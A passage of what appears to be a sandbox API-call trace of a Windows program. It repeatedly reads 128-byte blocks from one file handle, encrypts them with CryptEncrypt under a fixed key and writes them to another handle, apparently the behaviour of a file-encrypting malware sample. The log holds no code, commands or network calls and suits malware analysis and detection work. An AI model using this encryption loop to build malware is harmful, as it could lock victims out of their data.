hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.164] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.164] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.164] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.164] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.164] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.164] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.165] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.165] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.166] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.166] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.167] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.167] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.167] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.167] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.167] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.167] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.167] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.167] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.167] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, 